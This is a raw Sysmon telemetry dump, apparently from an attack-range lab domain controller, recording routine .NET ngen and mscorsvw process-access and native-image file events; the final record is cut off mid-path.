13:47:13.625{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9161-6005-6602-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.625{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9161-6005-6602-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:13.625{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9161-6005-6602-00000000A301}4580C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:13.515{59A5CD1D-915F-6005-6502-00000000A301}3092C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c14-0\System.Data.Services.dll2021-01-18 13:47:13.515 10341000x80000000000000006618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.984{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9162-6005-6902-00000000A301}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.984{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9162-6005-6902-00000000A301}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.750{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9162-6005-6802-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.734{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9162-6005-6802-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:14.734{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9162-6005-6802-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:14.656{59A5CD1D-9161-6005-6702-00000000A301}4620C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\120c-0\System.Data.Services.Client.dll2021-01-18 13:47:14.656 10341000x80000000000000006626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.672{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9163-6005-6B02-00000000A301}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.656{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9163-6005-6B02-00000000A301}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.656{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9163-6005-6B02-00000000A301}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.578{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9163-6005-6A02-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.578{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9163-6005-6A02-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.578{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9163-6005-6A02-00000000A301}604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:15.515{59A5CD1D-9162-6005-6902-00000000A301}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c08-0\System.Data.Services.Design.dll2021-01-18 13:47:15.515 10341000x80000000000000006619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:15.000{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9162-6005-6902-00000000A301}3080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006633Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.781{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9165-6005-6D02-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006632Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.765{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9165-6005-6D02-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006631Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.765{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9165-6005-6D02-00000000A301}4708C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006630Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9165-6005-6C02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006629Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.687{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9165-6005-6C02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006628Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:17.687{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9165-6005-6C02-00000000A301}4204C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:17.578{59A5CD1D-9163-6005-6B02-00000000A301}3184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\c70-0\System.Data.SqlXml.dll2021-01-18 13:47:17.578 10341000x80000000000000006637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:18.875{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9166-6005-6E02-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:18.859{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9166-6005-6E02-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:18.859{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9166-6005-6E02-00000000A301}4856C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\W